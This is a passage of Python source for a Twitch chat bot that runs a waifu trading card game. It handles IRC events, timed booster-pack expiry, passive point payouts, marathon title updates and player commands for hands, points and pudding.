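# usage sketch (hypothetical numbers): with cycleLength = 30 and numGoodRewards = 3 the
# target gap is 30 / 3 = 10, so every gap between good rewards must fall strictly
# between 5 and 20 before the seed is accepted:
# seed = generateRewardsSeed(30, 3)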
# returns (cycle length, number of good rewards) for use elsewhere
def getRewardsMetadata():
with db.cursor() as cur:
cur.execute("SELECT COUNT(*), SUM(IF(is_good != 0, 1, 0)) FROM free_rewards")
return cur.fetchone()
# From https://github.com/Shizmob/pydle/issues/35
class PrivMessageTagSupport(pydle.features.ircv3.TaggedMessageSupport):
def on_raw_privmsg(self, message):
""" PRIVMSG command. """
nick, metadata = self._parse_user(message.source)
tags = message.tags
target, message = message.params
self._sync_user(nick, metadata)
self.on_message(target, nick, message, tags)
if self.is_channel(target):
self.on_channel_message(target, nick, message, tags)
else:
self.on_private_message(nick, message, tags)
# End Github code
NepBotClass = pydle.featurize(pydle.Client, PrivMessageTagSupport)
class NepBot(NepBotClass):
config = {}
mychannels = []
instance = None
autoupdate = False
pw = None
nomodalerted = []
addchannels = []
leavechannels = []
emotecooldowns = {}
def __init__(self, config, channels):
super().__init__(config["username"])
self.config = config
self.mychannels = channels
NepBot.instance = self
def on_clearchat(self, message):
# print("Got clear chat message: " + str(message))
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if len(params) == 1:
logger.info("Chat in %s has been cleared by a moderator.", params[0])
return
u = params[1]
chan = params[0]
reason = "" if "ban-reason" not in tags else str(tags["ban-reason"]).replace("\\s", " ")
if "ban-duration" in tags.keys():
duration = tags["ban-duration"]
logger.info("%s got timed out for %s seconds in %s for: %s", u, duration, chan, reason)
else:
logger.info("%s got permanently banned from %s. Reason: %s", u, chan, reason)
return
def on_hosttarget(self, message):
# print("Got Host Target: " + str(message))
parts = str(message).split(" ")
sourcechannel = parts[2].strip("#")
target = parts[3].strip(":")
if target == "-":
logger.info("%s has stopped hosting", sourcechannel)
else:
logger.info("%s is now hosting %s", sourcechannel, target)
return
def on_userstate(self, message):
# print("Userstate...")
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if config["username"].lower() == "nepnepbot" and tags["display-name"] == "Nepnepbot" and params[
0] != "#nepnepbot" and tags["mod"] != '1' and params[0] not in self.nomodalerted:
logger.info("No Mod in %s!", str(params[0]))
self.nomodalerted.append(params[0])
self.message(params[0], "Hey! I noticed I am not a mod here! Please mod me to avoid any issues!")
return
def on_roomstate(self, message):
# print("Got Room State: " + str(message))
return
def on_raw_421(self, message):
# print("Got raw 421:" + str(message))
# Ignore twitch not knowing WHOIS
if str(message).find("WHOIS") > -1:
return
super().on_raw_421(message)
def on_whisper(self, message):
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
# print("WHISPER received: nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata, params=params, tags=tags))
self.on_message("#" + str(nick), str(nick), str(params[1]), tags, isWhisper=True)
def on_unknown(self, message):
if str(message).find("WHISPER") > -1:
self.on_whisper(message)
return
if str(message).find("CLEARCHAT") > -1:
self.on_clearchat(message)
return
if str(message).find("HOSTTARGET") > -1:
self.on_hosttarget(message)
return
if str(message).find("USERSTATE") > -1:
self.on_userstate(message)
return
if str(message).find("ROOMSTATE") > -1:
self.on_roomstate(message)
return
if str(message).find("USERNOTICE") > -1:
logger.info("PogChamp! Someone subbed to someone! here's the message: %s", str(message))
return
super().on_unknown(message)
def handleNameChange(self, oldName, newName):
return self.handleNameChanges({oldName: newName})
def handleNameChanges(self, nameMapping):
with db.cursor() as cur:
oldNames = list(nameMapping)
cur.execute("SELECT name FROM channels WHERE name IN(%s)" % ",".join(["%s" * len(oldNames)]), oldNames)
channelsFound = [row[0] for row in cur.fetchall()]
for oldName in channelsFound:
newName = nameMapping[oldName]
hOldName = "#" + oldName
hNewName = "#" + newName
# channel name changed, attempt to deal with it
try:
logger.debug("Attempting to handle channel name change %s -> %s..." % (oldName, newName))
cur.execute("UPDATE channels SET name = %s WHERE name = %s", [newName, oldName])
cur.execute("UPDATE bets SET channel = %s WHERE channel = %s", [hNewName, hOldName])
cur.execute("UPDATE boosters_opened SET channel = %s WHERE channel = %s", [hNewName, hOldName])
self.join(hNewName)
self.addchannels.append(hNewName)
self.leavechannels.append(hOldName)
self.part(hOldName)
logger.debug("OK, should be successful.")
except Exception:
logger.debug("Could not handle name change properly, abandoning the attempt.")
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting...")
def timer():
with busyLock:
global t
t = Timer(int(config["cycleLength"]), timer)
t.start()
logger.debug("Refreshing Database Connection...")
global db
try:
db.close()
except Exception:
logger.warning("Error closing db connection cleanly, ignoring.")
try:
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit=True,
charset="utf8mb4")
except Exception:
logger.error("Error Reconnecting to DB. Skipping Timer Cycle.")
return
with db.cursor() as cur:
# open packs?
cur.execute(
"SELECT boosters_opened.id, boosters_opened.userid, users.name FROM boosters_opened JOIN users ON boosters_opened.userid = users.id WHERE status = 'open' AND created <= %s",
[current_milli_time() - int(config["boosterTimeout"])])
packsToClose = cur.fetchall()
for pack in packsToClose:
userid = pack[1]
cur.execute("SELECT id FROM cards WHERE boosterid = %s ORDER BY waifuid ASC",
[pack[0]])
cardIDs = [row[0] for row in cur.fetchall()]
cards = [getCard(card) for card in cardIDs]
waifuIDs = [card['waifuid'] for card in cards]
# keep the best cards
cards.sort(key=lambda card: -card['base_rarity'])
# count any cards in the pack that don't take up hand space
# we can use this as a shortcut since these will always be the highest rarities too
nonSpaceCards = sum((1 if card['base_rarity'] >= int(config["numNormalRarities"]) else 0) for card in cards)
numKeep = int(min(max(handLimit(userid) - currentCards(userid), 0) + nonSpaceCards, len(cards)))
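# numKeep = free hand slots + special cards that take no hand space, capped at the pack size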
keeps = cards[:numKeep]
des = cards[numKeep:]
logger.info("Expired pack for user %s (%d): keeping %s, disenchanting %s", pack[2], userid,
str(keeps), str(des))
for card in keeps:
updateCard(card['id'], {"boosterid": None})
numPoints = 0
for card in des:
numPoints += disenchant(self, card['id'])
addPoints(userid, numPoints)
attemptPromotions(*waifuIDs)
cur.execute("UPDATE boosters_opened SET status='closed', updated = %s WHERE id = %s",
[current_milli_time(), pack[0]])
# inactivity timeout
# cur.execute("SELECT DISTINCT users.id, users.name FROM cards JOIN users ON cards.userid = users.id WHERE cards.rarity < %s AND users.inactivityImmunity = 0 AND (users.lastActiveTimestamp IS NULL OR users.lastActiveTimestamp < %s)", [config["numNormalRarities"], current_milli_time() - int(config["inactivityTimeoutDays"])*86400000])
# inactiveUsers = cur.fetchall()
# expireCount = len(inactiveUsers)
# expireCardCount = 0
# while len(inactiveUsers) > 0:
# inactiveSlice = inactiveUsers[:100]
# inactiveUsers = inactiveUsers[100:]
# logger.debug("Expiring users: "+(", ".join(row[1] for row in inactiveSlice)))
# expireCardCount += cur.execute("UPDATE cards SET userid = NULL, boosterid = NULL WHERE rarity < %s AND userid IN("+(",".join(["%s"] * len(inactiveSlice)))+")", [config["numNormalRarities"]] + [row[0] for row in inactiveSlice])
# if expireCardCount > 0:
# logger.debug("Expired %d cards from %d users" % (expireCardCount, expireCount))
# increase weightings
if int(config["last_weighting_update"]) < current_milli_time() - int(
config["weighting_increase_cycle"]):
logger.debug("Increasing card weightings...")
baseIncrease = float(config["weighting_increase_amount"])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity < %s",
[baseIncrease, int(config["strongerWeightingMinRarity"])])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity BETWEEN %s AND %s",
[baseIncrease**2, int(config["strongerWeightingMinRarity"]), int(config["numNormalRarities"])-1])
config["last_weighting_update"] = str(current_milli_time())
cur.execute("UPDATE config SET value = %s WHERE name = 'last_weighting_update'",
[config["last_weighting_update"]])
# rounding edge case
cur.execute("UPDATE waifus SET normal_weighting=1 WHERE normal_weighting BETWEEN 0.999 AND 1")
# pudding expiry?
now = datetime.datetime.now()
ymdNow = now.strftime("%Y-%m-%d")
if ymdNow > config["last_pudding_check"]:
logger.debug("Processing pudding expiry...")
config["last_pudding_check"] = ymdNow
cur.execute("UPDATE config SET value = %s WHERE name = 'last_pudding_check'", [ymdNow])
if now.day == 1:
# move pudding down a category, alert people with expiring pudding
cur.execute("UPDATE users SET puddingExpiring = puddingPrevious, puddingPrevious = puddingCurrent, puddingCurrent = 0")
cur.execute("SELECT name, puddingExpiring FROM users WHERE puddingExpiring > 0")
for userRow in cur.fetchall():
self.message("#%s" % userRow[0], "You have %d pudding expiring on the 8th of this month. !pudding to see your balance and to spend it." % userRow[1], True)
elif now.day == 8:
# actually expire pudding from 2 months ago
cur.execute("UPDATE users SET puddingExpiring = 0")
if booleanConfig("cpuWarActive") and now.minute < 5:
cpuVoters.clear()
self.message(config["marathonChannel"], "**You can now cast your votes for a CPU again!**", False)
logger.debug("Checking live status of channels...")
with busyLock:
checkAndRenewAppAccessToken()
cur = db.cursor()
cur.execute("SELECT users.name, users.id FROM channels JOIN users ON channels.name = users.name")
rows = cur.fetchall()
cur.close()
channelids = []
idtoname = {}
isLive = {}
viewerCount = {}
for row in rows:
channelids.append(str(row[1]))
idtoname[str(row[1])] = row[0]
isLive[str(row[0])] = False
while len(channelids) > 0:
currentSlice = channelids[:100]
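# the Helix streams endpoint accepts at most 100 user_id values per request, hence slices of 100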
response = requests.get("https://api.twitch.tv/helix/streams", headers=headers,
params={"type": "live", "user_id": currentSlice})
data = response.json()["data"]
for element in data:
chanName = idtoname[str(element["user_id"])]
isLive[chanName] = True
logger.debug("%s is live!", idtoname[str(element["user_id"])])
viewerCount[chanName] = element["viewer_count"]
channelids = channelids[100:]
marathonLive = config['marathonChannel'][1:] in viewerCount
logger.debug("Catching all viewers...")
for c in self.addchannels:
self.mychannels.append(c)
self.addchannels = []
for c in self.leavechannels:
try:
self.mychannels.remove(c)
except Exception:
logger.warning("Couldn't remove channel %s from channels, it wasn't found. Channel list: %s",
str(c), str(self.mychannels))
self.leavechannels = []
try:
# print("Activitymap: " + str(activitymap))
doneusers = set([])
validactivity = set([])
for channel in self.channels:
# print("Fetching for channel " + str(channel))
channelName = str(channel).replace("#", "")
try:
a = []
if channelName in viewerCount and viewerCount[channelName] >= 800:
logger.debug("%s had more than 800 viewers, catching from chatters endpoint", channelName)
with urllib.request.urlopen(
'https://tmi.twitch.tv/group/user/' + channelName + '/chatters') as response:
data = json.loads(response.read().decode())
chatters = data["chatters"]
a = chatters["moderators"] + chatters["staff"] + chatters["admins"] + chatters[
"global_mods"] + chatters["viewers"]
else:
logger.debug("Users in %s: %s", channel, self.channels[channel]['users'])
for viewer in self.channels[channel]['users']:
a.append(viewer)
doneusers.update(set(a))
if isLive[channelName]:
validactivity.update(set(a))
except Exception:
logger.error("Error fetching chatters for %s, skipping their chat for this cycle" % channelName)
logger.error("Error: %s", str(sys.exc_info()))
# process all users
logger.debug("Caught users, giving points and creating accounts, amount to do = %d" % len(doneusers))
newUsers = set([])
maxPointsInactive = int(config["maxPointsInactive"])
overflowPoints = 0
passivePoints = int(config["passivePoints"])
pointsMult = float(config["pointsMultiplier"])
maraPointsMult = float(config["marathonPointsMultiplier"])
doneusers = list(doneusers)
with busyLock:
with db.cursor() as cur:
cur.execute('START TRANSACTION')
while len(doneusers) > 0:
logger.debug('Slicing... remaining length: %s', len(doneusers))
currentSlice = doneusers[:100]
cur.execute("SELECT name, points, lastActiveTimestamp FROM users WHERE name IN(%s)" % ",".join(["%s"] * len(currentSlice)), currentSlice)
foundUsersData = cur.fetchall()
foundUsers = set([row[0] for row in foundUsersData])
newUsers.update(set(currentSlice) - foundUsers)
if len(foundUsers) > 0:
updateData = []
for viewerInfo in foundUsersData:
pointGain = passivePoints
if viewerInfo[0] in activitymap and viewerInfo[0] in validactivity:
pointGain += max(10 - int(activitymap[viewerInfo[0]]), 0)
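# the activity bonus decays by one point per cycle since the user last chatted
# (activitymap is incremented at the end of this cycle and reset to 0 on message),
# bottoming out at zero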
if viewerInfo[0] in marathonActivityMap and marathonActivityMap[viewerInfo[0]] < 10 and marathonLive:
altPointGain = passivePoints + 10 - marathonActivityMap[viewerInfo[0]]
altPointGain = round(altPointGain * maraPointsMult)
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * pointsMult)
if viewerInfo[2] is None:
maxPointGain = max(maxPointsInactive - viewerInfo[1], 0)
if pointGain > maxPointGain:
overflowPoints += pointGain - maxPointGain
pointGain = maxPointGain
if pointGain > 0:
updateData.append((pointGain, viewerInfo[0]))
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
doneusers = doneusers[100:]
cur.execute('COMMIT')
if overflowPoints > 0:
logger.debug("Paying %d overflow points to the bot account" % overflowPoints)
with busyLock:
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE name = %s",
[overflowPoints, config["username"]])
cur.close()
# now deal with user names that aren't already in the DB
newUsers = list(newUsers)
if len(newUsers) > 10000:
logger.warning(
"DID YOU LET ME JOIN GDQ CHAT OR WHAT?!!? ... capping new user accounts at 10k. Sorry, bros!")
newUsers = newUsers[:10000]
updateNames = []
newAccounts = []
updateData = []
# don't hold the busyLock the whole time here - since we're dealing with twitch API
while len(newUsers) > 0:
logger.debug("Adding new users...")
currentSlice = newUsers[:100]
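# the Helix users endpoint likewise caps at 100 login names per request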
logger.debug("New users to add: %s", str(currentSlice))
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": currentSlice})
if r.status_code == 429:
logger.warning("Rate Limit Exceeded! Skipping account creation!")
r.raise_for_status()
j = r.json()
if "data" not in j:
# error, what do?
r.raise_for_status()
currentIdMapping = {int(row["id"]): row["login"] for row in j["data"]}
logger.debug("currentIdMapping: %s", currentIdMapping)
foundIdsData = []
if len(currentIdMapping) > 0:
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id, name FROM users WHERE id IN(%s)" % ",".join(["%s"] * len(currentIdMapping)),
[id for id in currentIdMapping])
foundIdsData = cur.fetchall()
localIds = [row[0] for row in foundIdsData]
oldIdMapping = {row[0] : row[1] for row in foundIdsData}
# users to update the names for (id already exists)
updateNames.extend([(currentIdMapping[id], id) for id in currentIdMapping if id in localIds])
nameChanges = {oldIdMapping[id] : currentIdMapping[id] for id in currentIdMapping if id in localIds}
if len(nameChanges) > 0:
with busyLock:
self.handleNameChanges(nameChanges)
# new users (id does not exist)
newAccounts.extend([(id, currentIdMapping[id]) for id in currentIdMapping if id not in localIds])
# actually give points
for id in currentIdMapping:
viewer = currentIdMapping[id]
pointGain = passivePoints
if viewer in activitymap and viewer in validactivity:
pointGain += max(10 - int(activitymap[viewer]), 0)
if viewer in marathonActivityMap and marathonActivityMap[viewer] < 10 and marathonLive:
altPointGain = passivePoints + 10 - marathonActivityMap[viewer]
altPointGain = round(altPointGain * maraPointsMult)
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * pointsMult)
updateData.append((pointGain, viewer))
# done with this slice
newUsers = newUsers[100:]
# push new user data to database
with busyLock:
with db.cursor() as cur:
cur.execute("START TRANSACTION")
if len(updateNames) > 0:
logger.debug("Updating names...")
cur.executemany("UPDATE users SET name = %s WHERE id = %s", updateNames)
if len(newAccounts) > 0:
cur.executemany("INSERT INTO users (id, name, points, lastFree) VALUES(%s, %s, 0, 0)",
newAccounts)
if len(updateData) > 0:
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
cur.execute("COMMIT")
for user in activitymap:
activitymap[user] += 1
for user in marathonActivityMap:
marathonActivityMap[user] += 1
except Exception:
logger.warning("We had an error during passive point gain. skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
logger.warning("Last run query: %s", cur._last_executed)
if self.autoupdate and booleanConfig("marathonBotFunctions"):
logger.debug("Updating Title and Game with horaro info")
schedule = getHoraro()
try:
data = schedule["data"]
ticker = data["ticker"]
current = ticker["current"]
wasNone = False
if current is None:
current = ticker["next"]
wasNone = True
current = current["data"]
game = current[int(config["horaroGameColumn"])]
category = current[int(config["horaroCategoryColumn"])]
rStart = int(config["horaroFirstRunnerColumn"])
rNum = int(config["horaroNumRunnerColumns"])
runners = [getRawRunner(runner) for runner in current[rStart:rStart + rNum] if runner is not None]
args = {"game": game}
args["category"] = " (%s)" % category if category is not None else ""
args["comingup"] = "COMING UP: " if wasNone else ""
args["runners"] = (" by " + ", ".join(runners)) if len(runners) > 0 else ""
args["title"] = config["marathonTitle"]
args["command"] = config["marathonHelpCommand"]
title = "{comingup}{title} - {game}{category}{runners} - !{command} in chat".format(**args)
twitchGame = game
if data["schedule"]["columns"][-1] == "TwitchGame" and current[-1] is not None:
twitchGame = current[-1]
updateBoth(twitchGame, title=title)
if len(runners) > 0:
thread.start_new_thread(MarathonBot.instance.updateFollowButtons, (runners,))
except Exception:
logger.warning("Error updating from Horaro. Skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
if booleanConfig("marathonHelpAutopost"):
nextPost = int(config["marathonHelpAutopostLast"]) + int(config["marathonHelpAutopostPeriod"]) * 1000
if nextPost <= current_milli_time():
self.message(config["marathonChannel"], config["marathonHelpCommandText"], False)
config["marathonHelpAutopostLast"] = str(current_milli_time())
with busyLock:
with db.cursor() as cur:
cur.execute("UPDATE config SET value = %s WHERE name = 'marathonHelpAutopostLast'",
[config["marathonHelpAutopostLast"]])
if t is None:
timer()
def on_capability_twitch_tv_membership_available(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP AVAILABLE!")
return True
def on_capability_twitch_tv_membership_enabled(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP ENABLED!")
return
def on_capability_twitch_tv_tags_available(self, nothing=None):
logger.debug("WE HAS TAGS AVAILABLE!")
return True
def on_capability_twitch_tv_tags_enabled(self, nothing=None):
logger.debug("WE HAS TAGS ENABLED!")
return
def on_capability_twitch_tv_commands_available(self, nothing=None):
logger.debug("WE HAS COMMANDS AVAILABLE!")
return True
def on_capability_twitch_tv_commands_enabled(self, nothing=None):
logger.debug("WE HAS COMMANDS ENABLED!")
return
def on_disconnect(self, expected):
logger.error("Disconnected, reconnecting. Was it expected? %s", str(expected))
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
logger.info("Connected! joining channels...")
super().on_connect()
for channel in self.mychannels:
channel = channel.lower()
logger.debug("Joining %s...", channel)
self.join(channel)
def on_raw(self, message):
# print("Raw message: " + str(message))
super().on_raw(message)
def on_private_message(self, nick, message, tags):
super().on_private_message(nick, message)
return
def on_channel_message(self, target, nick, message, tags):
super().on_channel_message(target, nick, message)
return
def on_message(self, source, target, message, tags, isWhisper=False):
if isWhisper:
logger.debug("whisper: %s, %s", str(target), message)
else:
logger.debug("message: %s, %s, %s", str(source), str(target), message)
# print("Tags: " + str(tags))
sender = str(target).lower()
channelowner = str(source).lower().replace("#", "")
# verify tags
# do nothing if twitch id is somehow missing
if 'user-id' not in tags:
return
# failsafe since display-name can (very rarely) be null for certain Twitch accounts
if 'display-name' not in tags or not tags['display-name']:
tags['display-name'] = sender
activeCommands = ["checkhand", "points", "pudding", "freewaifu", "freebie", "disenchant",
"de", "buy", "booster", "trade", "lookup", "owners", "alerts", "alert", "redeem", "wars",
"war", "vote", "donate", "incentives", "upgrade", "search", "freepacks", "freepack", "bet",
"sets", "set", "setbadge", "giveaway", "raffle", "bounty", "profile", "packspending", "godimage",
"sendpoints", "sorthand"]
userid = int(tags['user-id'])
if userid in blacklist:
if message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "Account banned from playing TCG. If you're seeing this without knowing why, contact TCG staff @ %s/discord" % config["siteHost"], isWhisper)
return
elif "bot" in sender:
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id, banned FROM banned_users WHERE id = %s", [userid])
banrow = cur.fetchone()
if banrow is None:
cur.execute("INSERT INTO banned_users (id, banned) VALUES(%s, 1)", [userid])
blacklist.append(userid)
if message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "This account appears to be a bot. If it is not, contact TCG staff @ %s/discord to have it unbanned." % config["siteHost"], isWhisper)
return
if banrow[1] > 0:
# failsafe, but shouldn't happen (blacklist updated in DB but not reloaded)
if message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "Account banned from playing TCG. If you're seeing this without knowing why, contact TCG staff @ %s/discord" % config["siteHost"], isWhisper)
return
activitymap[sender] = 0
activitymap[channelowner] = 0
isMarathonChannel = source == config['marathonChannel'] and not isWhisper
if isMarathonChannel:
marathonActivityMap[sender] = 0
with busyLock:
with db.cursor() as cur:
# War?
if int(config["emoteWarStatus"]) == 1:
if sender not in self.emotecooldowns:
self.emotecooldowns[sender] = defaultdict(int)
for emote in emotewaremotes:
if emote in message and self.emotecooldowns[sender][emote] <= current_milli_time() - 60000:
cur.execute("UPDATE emoteWar SET `count` = `count` + 1 WHERE name = %s", [emote])
self.emotecooldowns[sender][emote] = current_milli_time()
cur.execute("SELECT name FROM users WHERE id = %s", [tags['user-id']])
user = cur.fetchone()
if user is None:
cur.execute("INSERT INTO users (id, name, points) VALUE (%s, %s, %s)",
[tags['user-id'], sender, 0])
logger.info("%s didn't have an account, created it.", tags['display-name'])
elif user[0] != sender:
logger.info("%s got a new name, changing it to: %s", user[0], sender)
cur.execute("UPDATE users SET name = %s WHERE id = %s", [sender, tags['user-id']])
self.handleNameChange(user[0], sender)
if message.startswith("!"):
parts = message.split()
command = parts[0][1:].lower()
if command in activeCommands:
with busyLock:
with db.cursor() as cur:
cur.execute(
"UPDATE users SET lastActiveTimestamp = %s, lastActiveChannel = %s WHERE id = %s",
[current_milli_time(), "$$whisper$$" if isWhisper else source, tags['user-id']])
self.do_command(command, parts[1:], target, source, tags, isWhisper=isWhisper)
def message(self, channel, message, isWhisper=False):
logger.debug("sending message %s %s %s" % (channel, message, "Y" if isWhisper else "N"))
if isWhisper:
super().message("#jtv", "/w " + str(channel).replace("#", "") + " " + str(message))
elif not silence:
super().message(channel, message)
else:
logger.debug("Message not sent as not Whisper and Silent Mode enabled")
def do_command(self, command, args, sender, channel, tags, isWhisper=False):
logger.debug("Got command: %s with arguments %s", command, str(args))
isMarathonChannel = channel == config['marathonChannel'] and not isWhisper
# temp workaround to keep old syntax valid
if command == "tokengacha":
command = "tokenshop"
args = ["gacha"] + args
if command == "as" and debugMode and sender in superadmins:
if len(args) < 2 or len(args[1]) == 0:
self.message(channel, "Usage: !as <user> <command>", isWhisper)
return
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id FROM users WHERE name = %s", [args[0]])
row = cur.fetchone()
if row is None:
self.message(channel, "User not found.")
return
userid = row[0]
self.do_command(args[1][1:].lower(), args[2:], args[0].lower(), channel,
{'display-name': args[0], 'user-id': userid, 'badges': []}, isWhisper)
return
with busyLock:
if command == config["marathonHelpCommand"] and isMarathonChannel:
self.message(channel, config["marathonHelpCommandText"], isWhisper)
return
if command == "cpu" and isMarathonChannel and booleanConfig("cpuWarActive"):
cpu = "" if len(args) < 1 else args[0].lower()
if cpu.startswith("hdn"):
cpu = cpu[3:]
if cpu in ["neptune", "noire", "blanc", "vert"]:
if tags['user-id'] in cpuVoters:
self.message(channel, "%s, you've already voted this hour!" % tags['display-name'], isWhisper)
return
with db.cursor() as cur:
cur.execute("UPDATE cpuwar SET votes = votes + 1 WHERE cpu = %s", [cpu])
formattedCpu = "HDN" + cpu[0].upper() + cpu[1:]
self.message(channel, "Registered %s's vote for %s" % (tags['display-name'], formattedCpu))
cpuVoters.append(tags['user-id'])
elif cpu != "":
self.message(channel, "Invalid choice. Valid votes are Neptune, Noire, Blanc or Vert.", isWhisper)
else:
with db.cursor() as cur:
cur.execute("SELECT cpu, votes FROM cpuwar ORDER BY votes DESC, cpu ASC")
currentVotes = cur.fetchall()
warStrings = ["%s - %d votes" % ("HDN" + row[0][0].upper() + row[0][1:], row[1]) for row in currentVotes]
self.message(channel, "Current results: %s" % ", ".join(warStrings), isWhisper)
if command == "quit" and sender in superadmins:
logger.info("Quitting from admin command.")
pool.disconnect(client=self, expected=True)
# sys.exit(0)
return
if command == "checkhand":
# print("Checking hand for " + sender)
cards = getHand(tags['user-id'])
if len(cards) == 0:
self.message(channel,
"%s, you don't have any waifus! Get your first with !freebie" % tags[
'display-name'], isWhisper=isWhisper)
return
currentData = currentCards(tags['user-id'], True)
limit = handLimit(tags['user-id'])
dropLink = "%s/hand?user=%s" % (config["siteHost"], sender)
msgArgs = {"user": tags['display-name'], "limit": limit, "curr": currentData['hand'],
"bounties": currentData['bounties'], "link": dropLink}
# verbose mode if it's a whisper or they request it
if len(args) > 0 and args[0].lower() == "verbose":
if isWhisper or followsme(tags['user-id']):
whisperChannel = "#%s" % sender
if currentData['bounties'] > 0:
self.message(whisperChannel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), True)
else:
self.message(whisperChannel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), True)
messages = ["Your current hand is: "]
for row in cards:
waifumsg = getWaifuRepresentationString(row['waifuid'], cardrarity=row[
'rarity']) + ' from {series} - {image} (Card ID {cardid}); '.format(**row)
if len(messages[-1]) + len(waifumsg) > 400:
messages.append(waifumsg)
else:
messages[-1] += waifumsg
for message in messages:
self.message(whisperChannel, message, True)
elif not isWhisper:
self.message(channel,
"%s, to use verbose checkhand, follow the bot! Follow it and try again." %
tags['display-name'])
else:
if currentData['bounties'] > 0:
self.message(channel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
else:
self.message(channel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
return
if command == "points":
with db.cursor() as cur:
cur.execute("SELECT points FROM users WHERE id = %s", [tags['user-id']])
points = cur.fetchone()[0]
pudding = sum(getPuddingBalance(tags['user-id']))
self.message(channel, "%s, you have %d points and %d pudding!" % (tags['display-name'], points, pudding), isWhisper)
return
if command == "pudding":
subcmd = "" if len(args) < 1 else args[0].lower()
if subcmd == "booster" or subcmd == "buy":
if len(args) < 2:
self.message(channel, "Usage: !pudding " + subcmd + " <name>", isWhisper)
return
# check that the pack is actually buyable
truename = boostername = args[1].lower()
mega = False
if boostername.startswith("mega"):
truename = boostername[4:]
mega = True
with db.cursor() as cur:
cur.execute("SELECT name, cost, canMega FROM boosters WHERE name = %s AND buyable = 1", [truename])
booster = cur.fetchone()
if booster is None or (mega and booster[2] == 0):
self.message(channel, "Invalid booster specified.", isWhisper)
return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you have an open booster already! !booster show to check it." %
tags['display-name'], isWhisper)
return
cost = math.ceil(int(booster[1])/int(config["puddingExchangeRate"]))*(5 if mega else 1)
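# e.g. (hypothetical numbers) a 1000-point pack at an exchange rate of 100 costs
# ceil(1000 / 100) = 10 pudding, or 50 for the mega version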
if not hasPudding(tags['user-id'], cost):
self.message(channel, "%s, you can't afford a %s booster. They cost %d pudding." % (tags['display-name'], boostername, cost), isWhisper)
return
takePudding(tags['user-id'], cost)
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truename, False, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you open a %s booster for %d pudding: %s/booster?user=%s" % (tags['display-name'], boostername, cost, config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % booster[0]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your booster, please try again later.",
isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d pudding" % (row[0], math.ceil(int(row[1])/int(config["puddingExchangeRate"]))) for row in boosters)
self.message(channel, "Current buyable packs: %s. !pudding booster <name> to buy a booster with pudding." % boosterInfo, isWhisper)
elif subcmd == "topup":
if len(args) < 2:
self.message(channel, "Usage: !pudding topup <amount>", isWhisper)
return
try:
amount = int(args[1])
except ValueError:
self.message(channel, "Usage: !pudding topup <amount>", isWhisper)
return
if amount <= 0:
self.message(channel, "Invalid amount of pudding to buy.", isWhisper)
return
pointsCost = amount * int(config["puddingExchangeRate"])
if not hasPoints(tags['user-id'], pointsCost):
self.message(channel, "%s, you don't have enough points to buy %d pudding. You need %d." % (tags['display-name'], amount, pointsCost), isWhisper)
return
addPoints(tags['user-id'], -pointsCost)
addPudding(tags['user-id'], amount)
newBalance = sum(getPuddingBalance(tags['user-id']))
msgArgs = (tags['display-name'], pointsCost, amount, newBalance)
self.message(channel, "%s, you spent %d points to buy %d extra pudding. You now have %d total pudding (!pudding for full details)" % msgArgs, isWhisper)
else:
# base: show pudding balance broken down
pudding = getPuddingBalance(tags['user-id'])
if sum(pudding) == 0:
self.message(channel, "%s, you don't currently have any pudding. You can earn some by participating in bets or completing sets." % tags['display-name'], isWhisper)
else:
